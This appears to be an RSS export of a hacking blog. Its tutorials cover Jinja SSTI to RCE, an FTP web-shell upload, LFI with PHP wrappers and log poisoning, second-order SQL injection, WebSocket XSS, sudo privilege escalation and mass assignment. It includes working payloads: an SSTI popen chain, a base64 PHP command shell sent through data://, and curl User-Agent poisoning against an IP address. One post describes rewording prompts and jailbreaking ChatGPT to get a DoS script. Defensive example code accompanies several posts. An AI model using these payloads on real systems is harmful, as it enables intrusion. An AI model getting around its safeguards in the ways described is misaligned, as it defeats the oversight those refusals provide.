<![CDATA[Isuk4 ]]>http://localhost:2368/http://localhost:2368/favicon.pngIsuk4 http://localhost:2368/Ghost 5.80Fri, 29 Mar 2024 04:35:54 GMT60<![CDATA[Get RCE With SSTI]]>Yo yo miss me right? Guess what Im back🥳🥳So lets talk about SSTI or Server-side template injection

]]>
http://localhost:2368/get-rce-with-ssti/660643469b5b334bfc6096b4Fri, 29 Mar 2024 04:30:17 GMT

Yo yo, miss me, right? Guess what, I'm back 🥳🥳 So let's talk about SSTI, or Server-side template injection.

As usual, we need to work through some background before jumping into SSTI. So let's try a template engine and learn what it is.

Let's use a template engine

A template engine is a software component designed to generate dynamic content based on a combination of pre-defined templates and data sources.


Bruh, let's simplify this 😂😂 Basically, a template engine is a software component that generates dynamic content from our templates, filling the placeholders in the template with data.

OK, so let's see an example.

I'm using the Jinja template engine (through Flask) for this:

from flask import Flask, render_template_string

app = Flask(__name__)

@app.route('/hello/')
@app.route('/hello/<name>')
def hello(name=None):
    # user input is concatenated into the template source itself (intentionally vulnerable)
    return render_template_string("<h1>Hi!!  "+name+"</h1>")
This app renders user data directly, without escaping or anything, so we can get XSS out of it. We could fix this (and I didn't).

OK, now we know a little about template engines (I mean, we don't know a lot about them).

So let's see where SSTI comes from.

What is SSTI

Server-Side Template Injection (SSTI) is a type of security vulnerability that occurs when an attacker can inject and execute malicious code on the server-side template engine. This can lead to unauthorized access, data theft, and other malicious activities.


I know that for people learning about SSTI for the first time this is hard to understand, so let's simplify it.

In template engines we can run template syntax.

Like this:

from flask import Flask,render_template_string

app = Flask(__name__)

@app.route('/hello/')
@app.route('/hello/<name>')
def hello(name=None):
    return render_template_string("{{3*3}}")

The output will be 9: the engine evaluates {{3*3}} before sending the page.

OK, I think you're getting it. So, do you remember I told you there is XSS (and also SSTI) because this app renders user data without any security measures?

from flask import Flask,render_template_string

app = Flask(__name__)

@app.route('/hello/')
@app.route('/hello/<name>')
def hello(name=None):
    return render_template_string("<h1>Hi!!  "+name+"</h1>")

OK, now let's see what happens if we put template syntax into this.

Did you see that? It rendered our syntax and gave us the result of 3*3, which is 9 🥳🥳

Yeah, we injected template syntax into the app and the template engine rendered it.

So SSTI is a vuln where an attacker can inject native template syntax into a server-side template, and it then executes on the server side. Now let's get RCE with SSTI.

Remote Code Execution

I know what you're thinking. You're thinking "we can just import the os module and get RCE". Hmmm, that's not gonna work.


It won't work because Jinja doesn't allow importing modules from native template syntax. But don't worry, there is a way.

So you know that everything in Python is an object?


That's right, Python is an OOP language, and in Python everything is an object.


So let's try to get access to the os module by walking through the objects.

And let's keep going by accessing classes.

OK, now let's get all subclasses of the base class.

Okay, now what we need to do is select a subclass that has access to the sys module.

warnings.catch_warnings uses the sys module, so I'm gonna use it.

So let's access the sys module.

So let's access the os module.

OK, now let's run a command with this.

So let's do this in our web app and build our payload.

And I got my payload:

{{"isuk4".__class__.__base__.__subclasses__()[162].__init__.__globals__['sys'].modules['os'].popen('whoami').read()}}

So let's run this.

So this is it, SSTI. Remember, I only used Jinja for this post; there are other template engines.
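The fix the post mentions but doesn't apply, as an added example that is not the post's code. It uses Jinja2 directly (Flask's render_template_string is a thin wrapper over it) and assumes Jinja2 is installed: the vulnerable concatenation beside the fixed route, plus SandboxedEnvironment as a second layer that refuses the __class__ walk the payload above depends on.

```python
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment


def hello_vulnerable(name):
    """Same shape as the post's Flask route: user input is glued into the
    template SOURCE, so the engine treats it as template syntax."""
    env = Environment()
    return env.from_string("<h1>Hi!!  " + name + "</h1>").render()


def hello_fixed(name):
    """The template is a constant and the user input is passed as DATA through
    the render context, so {{ ... }} inside the input is just text.
    autoescape=True also closes the XSS the post saw in the same route."""
    env = Environment(autoescape=True)
    return env.from_string("<h1>Hi!!  {{ name }}</h1>").render(name=name)


def sandbox_blocks(template_source):
    """Defence in depth: SandboxedEnvironment refuses the attribute walk
    (__class__ -> __base__ -> __subclasses__ ...) the payload relies on.
    Returns True if the sandbox raised SecurityError, False if it rendered."""
    env = SandboxedEnvironment()
    try:
        env.from_string(template_source).render()
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    probe = "{{3*3}}"
    print(hello_vulnerable(probe))  # <h1>Hi!!  9</h1>       -> input was evaluated
    print(hello_fixed(probe))       # <h1>Hi!!  {{3*3}}</h1>  -> input stayed text
    print(hello_fixed("<b>x</b>"))  # <h1>Hi!!  &lt;b&gt;x&lt;/b&gt;</h1>
    print(sandbox_blocks("{{ ''.__class__.__base__.__subclasses__() }}"))  # True
```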

echo "so GGS!Ima off"

so GGS!Ima off

]]>
<![CDATA[Getting RCE from web via ftp exploit]]>Yo yo homies I’m back . yeah this post is in a different category than my other post(that’s why my banner template changed)

]]>
http://localhost:2368/getting-rce-from-web-via-ftp-exploit/65fa762bb3cb044458c324ffWed, 20 Mar 2024 05:40:44 GMT

Yo yo homies, I'm back. Yeah, this post is in a different category than my other posts (that's why my banner template changed).

So first we need to talk about what FTP is and why we're using it.

What is FTP

The File Transfer Protocol is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network

Aaaugh, too long bruh, so let's simplify this.

So basically, FTP is a network protocol that transfers files between computers over a TCP/IP-based network.

So why do we use it for web applications?

Web apps don't need FTP, but in some cases developers use FTP to maintain web apps.

OK, so I can give you a real-world scenario (generated by Gemini).

Now we need to learn how to manage an FTP connection, because we can't attack an FTP server without knowing how FTP connections work.

How to manage an FTP connection

Okay, let's see how we connect to FTP.

So first I'm scanning ports.


So now we know a little about the server, and we found a jackpot (anonymous login for FTP).

So let's log in to FTP anonymously.

OK, let's explore this, yeeeah.

So let's see how we can deface a website with this (or at least get the website's data).

Now we need to set up a lab to exploit.

Set up a lab to exploit

So I'm gonna make a simple PHP page that shows the images in a "gallery" folder, and I'm uploading the images with FTP.

https://gist.github.com/isuk4s4/e5d170edfd10af4343b9f87909d02c0

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Image Gallery</title>
 <style>
body {
  font-family: Arial, sans-serif; 
  margin: 0;
  background-color: #222; 
  color: #fff; 
}

.gallery {
  display: flex;
  flex-wrap: wrap;
  justify-content: space-between;
  padding: 20px;
  max-width: 1000px;
  margin: 0 auto;
}

.gallery img {
  margin: 10px;
  width: 250px; 
  border-radius: 5px;
  transition: transform 0.3s ease-in-out;
}

.gallery img:hover {
  transform: scale(1.05); 
  box-shadow: 0 0 5px rgba(0, 0, 0, 0.3); 
}

h1 {
  text-align: center;
  margin-bottom: 20px;
  font-weight: 300;
  font-size: 2em;
  letter-spacing: 1px; 
  color: #ddd;
}


 </style>
</head>
<body>
  <h1>Image Gallery</h1>
  <div class="gallery">
    <?php
      $images_dir = "gallery/";

      if ($dir = opendir($images_dir)) {
        while (false !== ($file = readdir($dir))) {
          $lower = strtolower($file);
          if (strpos($lower, ".jpg") !== false
              || strpos($lower, ".png") !== false
              || strpos($lower, ".gif") !== false
              || strpos($lower, ".webp") !== false) {
            echo "<img src='" . $images_dir . $file . "' alt='" . $file . "'>";
          }
        }
        closedir($dir);
      } else {
        echo "Error: Could not open image directory.";
      }
    ?>
  </div>
</body>
</html>
And let's set up the FTP server.

If you're trying this on Linux, read this, because I'm doing it on my Windows machine:

How to setup and configure an FTP server in Linux? - GeeksforGeeks

So let's make the FTP server:

  • Go to Programs and Features and turn on these features.
  • And press confirm.
  • Now open IIS Manager and add an FTP site.

Tap tap tap, oh wait, there is something important.

Yeah, this is why we can find vulnerable FTP servers (this is only one vuln; there are other vulns in some FTP servers).

  • Allow FTP through Windows Firewall.

And let's see.

Yeah, now we've got our FTP server, so let's exploit it.

So forget everything we know about this application and its setup, because we built this lab ourselves and already know how it can be exploited.

Let's enumerate this.

Enumeration

Yeah, again "we got a jackpot": anonymous login is enabled.

So let's log in.

OK, let's upload a shell.

And all we need to do is upload this shell to the server.

So let's check it.

We can't see our shell in the gallery because it only shows images, but we can find the path from the browser.

Yeah, there it is, our lil shell. Let's open it and test it.

So this is it. But this is only one way to do it, and there are many things in FTP. GGS

echo "GGS!Ima Off";

]]>
<![CDATA[Secrets of LFI🤫]]>Yo yo homies Guess what? I lunched my web .ok so you can see my crackhead blog and portfolio :- so lets start

]]>
http://localhost:2368/lfi/65f05a0e7c7cfe36bc88cc76Tue, 12 Mar 2024 13:40:37 GMT

Yo yo homies, guess what? I launched my website. OK, so you can see my crackhead blog and portfolio :- So let's start.

Layout handling is crucial in web dev, but sometimes silly devs handle layout like this:

http://example.com/home.php?page=profile.php

And as we navigate through this layout, the page parameter changes to filenames.

So let's see how it can be a security risk.

What is LFI

Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server.

Simply put, LFI is an attack technique where the attacker runs or exposes files from the server 😎

So let's see examples of LFI.

LFI example

This is a CTF (picoCTF "forbidden path"), so notice that real-world applications can be different.

This website includes any file that we give it, so I'm trying to get /etc/passwd from it.

Booom. Now I think you understand what LFI is, so let's see how we can exploit it.

There are lots of ways to exploit LFI; it depends on the system. So let's see the ways to get RCE from LFI:

  • PHP Wrappers
  • Log poisoning
  • Uploaded File inclusion

PHP Wrappers

PHP stream wrappers are a feature that provides a unified way of accessing different types of data sources or protocols using a common interface. In essence, stream wrappers allow you to use the same set of functions to read from or write to various types of resources, such as files, HTTP, FTP, databases, and more. They abstract the underlying complexity of handling different types of streams.

OK, let's see how we can use this to exploit LFI.

So you can see this page includes the file named in the lang parameter, so I tried to include /etc/passwd in the page.

Yeah, there is an LFI :) So let's get RCE from the data wrapper.

First we need to check whether allow_url_include is enabled or not, because the data wrapper is only available when allow_url_include is enabled. OK, let's check:
php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini

We use a wrapper again 😂 Here we base64-encode the php.ini file so the web server doesn't process it on the way out.

Now let's run and check.

And we need to decode it:

echo "W1BIUF0KCjs7Ozs7Ozs7Ozs7Ozs7Ozs..." | base64 -d | grep allow_url_include

And the output will look like this:

allow_url_include = On

OK, so let's do this then.

You know we can use the data wrapper to include external data into the web page (including PHP). These snippets are from the PHP manual's page on the data:// wrapper:


<?php
$fp = fopen('data:text/plain,'.urlencode($data), 'rb'); // urlencoded data
$fp = fopen('data:text/plain;base64,'.base64_encode($data), 'rb'); // base64 encoded data
?>



Demonstration of invalid usage:

<?php
$data = 'Günther says: 1+1 is 2, 10%40 is 20.';

$fp = fopen('data:text/plain,'.$data, 'rb'); // INVALID, never do this
echo stream_get_contents($fp);
// Günther says: 1 1 is 2, 10@ is 20. // ERROR

$fp = fopen('data:text/plain,'.urlencode($data), 'rb'); // urlencoded data
echo stream_get_contents($fp);
// Günther says: 1+1 is 2, 10%40 is 20. // OK

// Valid option 1: base64 encoded data
$fp = fopen('data:text/plain;base64,'.base64_encode($data), 'rb'); // base64 encoded data
echo stream_get_contents($fp);
// Günther says: 1+1 is 2, 10%40 is 20. // OK
?>

So we're gonna get a shell through the data wrapper:

echo '<?php system($_GET["cmd"]); ?>' | base64

PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

So we're gonna include this base64 (we could also use urlencode), and the wrapper decodes it on the website, so the PHP code executes:

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=whoami
So it worked. Now let's see how we can do this with log poisoning.

What is log poisoning

Log poisoning is an attack technique that injects malicious code into server log files, so we can then include that log file and execute it.

So let's see how we can do it.

So you know log files record our request details; if we inject malicious code into a request header, it will be saved in the log.

So let's start.

So I found the log file and included it. Now I'm going to do the log poisoning.

OK, I sent a request with curl and set my User-Agent to PHP code that outputs the username:

curl -A "<?php system('whoami'); ?>" 94.237.62.99:37999/index.php?language=en.php
Yeah, it gives us the username "www-data". So let me try another code:

curl -A "<?php phpinfo(); ?>" 94.237.62.99:37999/index.php?language=en.php
Yeah baby, so this is it, log poisoning.
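The detection side of both techniques above (the PHP wrapper payloads and the log-poisoning User-Agent), as an added example that is not the post's code: a small scanner over Apache combined-format access log lines. The parameter names, log lines and IPs are constructed for the example and mirror the requests shown in the post.

```python
import re
from urllib.parse import unquote, urlsplit

# Parameters the post shows being used for inclusion (page, language) plus 'file'.
INCLUDE_PARAMS = {"page", "language", "lang", "file"}

WRAPPER_RE = re.compile(r"^(php|data|expect|phar|zip|glob|file)://", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]|/etc/passwd|/proc/self|/var/log/", re.IGNORECASE)
PHP_TAG_RE = re.compile(r"<\?(php\b|=)", re.IGNORECASE)

# Apache combined log format: ip ident user [time] "METHOD path PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def query_params(path):
    """Yield (name, decoded value) pairs. Split only on '&' so a ';' inside a
    data: URI stays part of the value whatever the Python version."""
    for pair in urlsplit(path).query.split("&"):
        if "=" in pair:
            name, _, value = pair.partition("=")
            yield name, unquote(value)


def analyse_line(line):
    """Return a list of findings for one log line (empty when nothing is suspicious)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    findings = []
    for name, value in query_params(m["path"]):
        if name.lower() not in INCLUDE_PARAMS:
            continue
        if WRAPPER_RE.search(value):
            findings.append(f"stream wrapper in {name}: {value[:48]}")
        elif TRAVERSAL_RE.search(value):
            findings.append(f"path traversal in {name}: {value[:48]}")
    if PHP_TAG_RE.search(m["agent"]):
        findings.append(f"PHP tag in User-Agent (log poisoning attempt): {m['agent'][:48]}")
    return findings


def scan_log(lines):
    """Return [(ip, path, findings)] for every line that produced a finding."""
    hits = []
    for line in lines:
        findings = analyse_line(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m["ip"] if m else "?", m["path"] if m else line, findings))
    return hits


# Constructed sample lines (not from a real server) mirroring the post's requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2024:13:40:37 +0000] "GET /index.php?language=en.php HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:13:41:02 +0000] "GET /index.php?language=../../../../etc/passwd HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:13:41:40 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini HTTP/1.1" 200 90120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:13:42:15 +0000] "GET /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=whoami HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:13:43:01 +0000] "GET /index.php?language=en.php HTTP/1.1" 200 1834 "-" "<?php system(\'whoami\'); ?>"',
]

if __name__ == "__main__":
    for ip, path, findings in scan_log(SAMPLE_LOG):
        print(ip, path[:60], findings)
```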

But there is always a catch.

Some websites have LFI with a hardcoded .php extension:

<?php 
include($_GET['file'].".php");
?>
So what can we do about this?

  • We can get the source code of files
  • We can try to get RCE with pearcmd.php

We can get the source code of files

So I told you about PHP wrappers; now we can use them to get the source code.

Do you remember how I got the php.ini file? Now we're gonna do the same:

base64 it with the php://filter wrapper

Yeah, all we need to do now is decode this and get the source code:

echo "PD9waHAKJHAyID0gIjxwPlRoZSBpZGVhIG9mIH…" | base64 -d

So let's talk about the pearcmd method in the next post, because if I add more things this post will get boring.

So I will be back with LFI part 2.

echo "I will be back with LFI part 2"
]]>
<![CDATA[Era of hacking with AI]]>So recently I went to Bugcrowd and saw a report paper called Inside the Mind of a Hacker So when I read that newspaper, I remembered what was done these days.so Lets start.

]]>
http://localhost:2368/era-of-hacking-with-ai/65edae8b1fdbf5177cf0318fSun, 10 Mar 2024 12:59:48 GMT

So recently I went to Bugcrowd and saw a report called "Inside the Mind of a Hacker". When I read that report, I remembered what's being done these days. So let's start.

Process of generative AI

So AI generates the response to our input based on how it was trained. Hmmm.

So I used AI for different things (I mean for pentesting purposes):

  • Code analysis
  • Confirming vulns
  • Writing exploits

Like that. But there are more things we can do with AI; that paper "Inside the Mind of a Hacker" tells us there are lots of use cases for AI.

But there are some problems, brrrr. Like, AI bots won't directly allow you to generate such things; they have rules.

But I can do this another way. Mmmm, like if I can think about how the script needs to work, I can generate it with other prompts.

I mean, look at this beautiful chat.

So like that, there are lots of use cases, and sometimes we even need to jailbreak ChatGPT.

What is Jailbreaking

Jailbreaking is the process of removing software restrictions imposed by the manufacturer or operating system on devices like smartphones and tablets

How can we do it?

So we enter our input into the AI bot and it generates output for our input, so we can input something to the AI to jailbreak it.

I tried a few prompts but all of them failed, but I could find one prompt that works.

Yes sir, I got a DoS script from ChatGPT 😎😎 But there is a catch.

You see, ChatGPT won't generate scripts for attacks, and we need to jailbreak it or do something similar, which isn't very practical. So I searched for ways to do this without a jailbreak, and then I found a golden website.

Ladies and gentlemen, welcome HackerGPT.

In HackerGPT you don't need any jailbreak techniques; it will do anything to do with hacking.

And this can be bad and good.

So this is it, Era of hacking with AI.

echo "GGS!Ima off"

So GGS!Ima off

]]>
<![CDATA[Payload will after you]]>Yo homies I’m back with another post.so lets start

]]>
http://localhost:2368/payload-will-after-you/65edadad1fdbf5177cf0317aSun, 10 Mar 2024 12:57:42 GMT

Yo homies, I'm back with another post. So let's start.

Before we dive into second-order SQL injection, we need to talk about what SQL injection is.

What is SQL injection

So SQL injection is an attack that injects a malicious SQL query into an application, which then executes it. Take this query:

SELECT * FROM `users` WHERE `name`='Isuk4' AND `pass`='Isuk4';
But what if an attacker inserts a SQL query into this?

SELECT * FROM `users` WHERE `name`=' ' OR '1' AND `pass`=' ' OR '1';
So I think you already know this. Heeee.

So let's deep dive into second-order SQL injection.

What is a second-order attack

So in a first-order attack (I mean any first-order attack) the payload executes immediately, but it's different in second-order attacks: in second-order attacks the payload is stored and executes later. 🤢🤢

Hmm, let me say this straight. In second-order attacks the payload executes later: we inject a payload and it executes afterwards somewhere else in the application, on other pages or in other functions.

I think you got that 😎

So I downloaded an example app for second-order SQL injection.

Here is the link: https://github.com/riyazwalikar/sql-injection-training-app

OK, I set that up, went to phpMyAdmin and saw there is a user called admin, so my mission is to get the admin password and take over the admin user (although I could do it with phpMyAdmin).

OK, I went to the second-order example page.

OK, now I'm trying to find whether there is a second-order SQL injection in this web app (lol, this is an example application).

I tested it by adding single quotes to the inputs.

OK, this page doesn't have the vuln, but when I went to the "Change password" page I got this:

Hmm, so I found the vuln. Now I need to achieve my goal.

So I inject a payload for it:

' or 1 in (select password from users where username='admin') -- //
Yeah, now all I need is to crack this MD5 hash.

Yeeeah baby.

So this is it. But remember, this is an easy example; real-world applications can be different and the vulns hard to find :-
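The second-order flow above, as an added example that is neither the post's code nor the training app it links: modelled with Python's sqlite3 on an in-memory table (the usernames, MD5 hashes and payload are constructed). Registration is parameterised, so the first-order single-quote test finds nothing; the vulnerable change-password handler then rebuilds its UPDATE from the username stored in the database, while the fixed handler binds that value like any other input.

```python
import hashlib
import sqlite3


def new_db():
    """In-memory users table with one pre-existing admin (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    con.execute("INSERT INTO users VALUES (?, ?)",
                ("admin", hashlib.md5(b"adminpass").hexdigest()))
    return con


def register(con, username, password):
    """First-order safe: parameterised, so a single quote in the username is
    stored verbatim instead of breaking the query."""
    con.execute("INSERT INTO users VALUES (?, ?)",
                (username, hashlib.md5(password.encode()).hexdigest()))


def change_password_vulnerable(con, username, new_password):
    """Second-order bug: the username read back from the database is treated
    as trusted and spliced into SQL text. A stored username of  admin' --
    turns the WHERE clause into  username='admin' --'  and the rest is a comment."""
    (stored,) = con.execute("SELECT username FROM users WHERE username = ?",
                            (username,)).fetchone()
    hashed = hashlib.md5(new_password.encode()).hexdigest()
    con.execute(f"UPDATE users SET password='{hashed}' WHERE username='{stored}'")


def change_password_fixed(con, username, new_password):
    """Data that came out of the database is still data: bind it."""
    (stored,) = con.execute("SELECT username FROM users WHERE username = ?",
                            (username,)).fetchone()
    hashed = hashlib.md5(new_password.encode()).hexdigest()
    con.execute("UPDATE users SET password=? WHERE username=?", (hashed, stored))


def password_of(con, username):
    return con.execute("SELECT password FROM users WHERE username = ?",
                       (username,)).fetchone()[0]


def admin_overwritten(change_password):
    """Run register -> change password with a second-order payload as the
    username and report whether the ADMIN row's password hash changed."""
    con = new_db()
    before = password_of(con, "admin")
    attacker_name = "admin' -- "
    register(con, attacker_name, "whatever")
    change_password(con, attacker_name, "owned")
    return password_of(con, "admin") != before


if __name__ == "__main__":
    print("vulnerable handler changed admin's password:",
          admin_overwritten(change_password_vulnerable))  # True
    print("fixed handler changed admin's password:",
          admin_overwritten(change_password_fixed))       # False
```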

So I'ma off.

echo "GGS! Ima off"
]]>
<![CDATA[Real time exploitation | Isuk4]]>Yo yo homies.im back with another post.so lets start

]]>
http://localhost:2368/real-time-exploitation-isuk4/65edad351fdbf5177cf0316dSun, 10 Mar 2024 12:54:26 GMT

Yo yo homies, I'm back with another post. So let's start.

Hmmm. Did you ever chat with live agents? If you did, you know that it's a real-time chat: the live agent can see your message in real time.

So how do developers make that? Well, there is a thing called WebSocket.

How does websocket work

WebSockets work by establishing a persistent connection between the client and server over a single TCP socket. Once the connection is established, data can be sent and received in real-time between the client and server.

Damn, we can use this thing to do lots of work.

Hmm, so let's deep dive into this.

So there are lots of vulns that can come with WebSockets.

XSS with WebSockets

So with WebSockets we can still inject JS payloads, brrrr. But it's kinda different. Actually, not that different. So let's hop into that.

Okay, now I'll demonstrate with a PortSwigger lab.

Okay, so I access the live chat.

When I click and inspect this request with Burp Suite:

It's a WebSocket message, and I managed to edit this message into an XSS payload.

And boom 💥💥

And remember, these vulns aren't limited to XSS. They can lead to lots of vulns like SQL injection, XXE and NoSQL injection. So basically these are just normal web vulns, but over the WebSocket protocol.

So I'ma off.

echo "GGS!Ima off";
]]>
<![CDATA[Art of the ROOT ☠️🔒]]>Hey I’m back with another interesting topic.First of all did you notice anything new.yep a new cover its because this is out of web hacking.lets start

]]>
http://localhost:2368/art-of-the-root/65edac741fdbf5177cf03162Sun, 10 Mar 2024 12:51:22 GMT

Hey, I'm back with another interesting topic. First of all, did you notice anything new? Yep, a new cover, because this is outside web hacking. Let's start.

First of all we need to talk about what privilege escalation is.

01. What is privilege escalation☠️

So you know that in an OS there are users. Every user has their own privileges, and those can differ: while some users can read and write files, some can only read files 😒

But there is a user that can do everything; we call him "root".

OK, there are ways to get root access without authorization, by exploiting vulns or bugs, etc. That's what we call privilege escalation. Here I'm going to explain this properly.

So basically, privilege escalation is the process of gaining privileges or permissions without authorization. This can be done by exploiting vulns or bugs. OK, now let's see how we can do it.

The way of doing this can differ. First we need to enumerate the OS.


02. Enumerate the os

Usually I first try to get OS information.

First I search for the kernel version.

If there is an exploit for the kernel, we can use it to gain root privileges. I can exploit the system and gain root like this. Boom 💥

If there isn't a vuln for it, we need to focus on what can run with sudo: we need to find the commands that the user is allowed to execute with root privileges.

I'm the admin of my machine, so I didn't give any sudo permissions to any programs.

OK, so I need to demonstrate this with a TryHackMe machine.


03. Exploit

Let's exploit 💥💥

Hmmm, I think you see that the system allows running nano, find and less with sudo privileges.

I used GTFOBins to find a way to get root privileges with nano, less or find, but I decided to get root with less.

Boom, I got root. This is a long process when you enumerate the system manually, so we can use scripts such as LinPEAS and LES.

OK, there are lots of techniques. I can't tell you everything I know about Linux privilege escalation in one post, so I will be back with another post.
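The sudo step above from the auditing side, as an added example that is not the post's or TryHackMe's code: a helper that parses the commands block of `sudo -l` output and flags rules that hand root a binary GTFOBins lists as a shell escape, which is exactly what the nano/find/less rule in the post was. The sample output, host name and user name are constructed.

```python
import re

# Binaries from the post (nano, find, less) plus a few other well-known entries
# that GTFOBins lists as able to spawn a shell. Illustrative, not complete.
SHELL_ESCAPES = {"nano", "find", "less", "more", "vim", "vi", "awk", "perl",
                 "python", "python3", "env", "bash", "sh"}

# "(ALL) NOPASSWD: /bin/nano, /usr/bin/find"  ->  runas, tags, comma-separated commands
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(output):
    """Return (runas, tags, command) triples from the commands block of `sudo -l`."""
    rules = []
    in_block = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_block = True
            continue
        if not in_block or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        for cmd in m["cmds"].split(","):
            rules.append((m["runas"].strip(), tags, cmd.strip()))
    return rules


def runs_as_root(runas):
    """A runas spec is 'user' or 'user : group'; ALL or root means root."""
    return runas.split(":")[0].strip() in ("ALL", "root")


def risky_rules(output):
    """(binary, nopasswd, note) for rules that give root a shell-capable binary, or everything."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(output):
        if not runs_as_root(runas):
            continue
        nopasswd = "NOPASSWD" in tags
        if cmd == "ALL":
            findings.append(("ALL", nopasswd, "any command as root"))
            continue
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPES:
            findings.append((binary, nopasswd,
                             f"{cmd}: {binary} can spawn a root shell (see GTFOBins)"))
    return findings


# Constructed sample output (not from a real host) with the post's nano/find/less rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for alice on lab:
    env_reset, mail_badpass

User alice may run the following commands on lab:
    (ALL) NOPASSWD: /bin/nano, /usr/bin/find, /usr/bin/less
    (root) /usr/bin/systemctl restart apache2
    (www-data) /usr/bin/php
"""

if __name__ == "__main__":
    for binary, nopasswd, note in risky_rules(SAMPLE_SUDO_L):
        print(f"[{'NOPASSWD' if nopasswd else 'password'}] {note}")
```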

echo "GGS!Ima off"

GGS!Ima off

]]>
<![CDATA[Request can be malicious]]>Heey after about week im back so lets start.


]]>
http://localhost:2368/request-can-be-malicious/65edabe71fdbf5177cf03154Sun, 10 Mar 2024 12:49:34 GMT

Heey, after about a week I'm back, so let's start.

So first, this story begins with my homie sending me a web backend built with Express.js to fix a bug 😒 So I fixed it, but you know me 😂 after I fixed it I read the whole code. Hmm, there was something interesting to me: the code he wrote to add users to the DB:

app.post('/users', async (req, res) => {
  try {
    const userData = req.body;            // the whole request body, unfiltered
    const newUser = new User(userData);   // every key in the body becomes a field
    await newUser.save();
    res.status(201).json({ message: 'User created successfully', user: newUser });
  } catch (error) {
    console.error(error);
    res.status(500).json({ message: 'Internal Server Error' });
  }
});

OK, so what's wrong with this?

Let me explain.

I sent a few requests and found that if I send DB column names and a value for each column in a request, they get added to the DB 😲 So if there is a column in the DB called role (which defines a role for the user), I can send a request with whatever role I want and it will be added to the DB.

OK, so let me simplify it.

It's like, if I send a request with the same fields the program inserts, they get stored. Or I can say it like this: "developers inject an entire set of user-entered data from a form directly into an object or database". This is what we call mass assignment.

So if I send a request like this:

POST /users HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Content-Type: application/json
Content-Length: 107  
Accept: application/json
Custom-Header: Custom-Value

{"username":"example", "email":"example@example.com", "password":"secret","role":"admin"}

Boom, I created an admin user without any permissions 😂 So it is what it is. So let's see what this dude (I mean mass assignment) can do to systems.

Risks of mass assignment

  1. Unauthorized Access: Attackers may exploit mass assignment to modify user roles or permissions, gaining unauthorized access to sensitive areas of the application or system.
  2. Elevation of Privileges: An attacker could manipulate object properties to elevate their privileges within the system, gaining access to functionality or data they are not supposed to have.
  3. Data Tampering: Mass assignment vulnerabilities can be exploited to modify or tamper with critical data, potentially leading to data integrity issues and incorrect processing of information.
  4. etc …
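The check the Express handler above is missing, as an added example that is not the post's code: a Python model of the same route with an explicit allowlist of client-settable fields. Unknown fields such as role are rejected with a 400 rather than silently dropped, so the attempt is visible in logs, and role comes from a server-side default. The request body is the one from the post, used as constructed sample input.

```python
from dataclasses import dataclass

# Fields a signup request is allowed to set; everything else (role, id,
# is_verified, ...) is server-controlled and never read from the body.
CLIENT_FIELDS = {"username", "email", "password"}


class MassAssignmentError(ValueError):
    """Raised when a request tries to set a field the client does not own."""


@dataclass
class User:
    username: str
    email: str
    password: str          # hash before storage in real code; out of scope here
    role: str = "user"     # server default, never client-supplied


def build_user_vulnerable(body):
    """Mirrors  new User(req.body) : every key in the body becomes a field."""
    return User(**body)


def build_user(body):
    """Allowlist the body. Unknown keys are rejected rather than silently
    dropped, so an attempt to set 'role' shows up as a 400 in the logs."""
    unexpected = set(body) - CLIENT_FIELDS
    if unexpected:
        raise MassAssignmentError(f"unexpected fields: {sorted(unexpected)}")
    missing = CLIENT_FIELDS - set(body)
    if missing:
        raise ValueError(f"missing fields: {sorted(missing)}")
    return User(username=str(body["username"]), email=str(body["email"]),
                password=str(body["password"]))


def handle_post_users(body):
    """Same contract as the Express route: returns (status, response dict)."""
    try:
        user = build_user(body)
    except (MassAssignmentError, ValueError) as e:
        return 400, {"message": str(e)}
    return 201, {"message": "User created successfully", "user": user}


# The request body from the post, as constructed sample input.
ATTACK_BODY = {"username": "example", "email": "example@example.com",
               "password": "secret", "role": "admin"}

if __name__ == "__main__":
    print(build_user_vulnerable(ATTACK_BODY).role)   # admin  (the bug)
    print(handle_post_users(ATTACK_BODY))            # (400, {'message': "unexpected fields: ['role']"})
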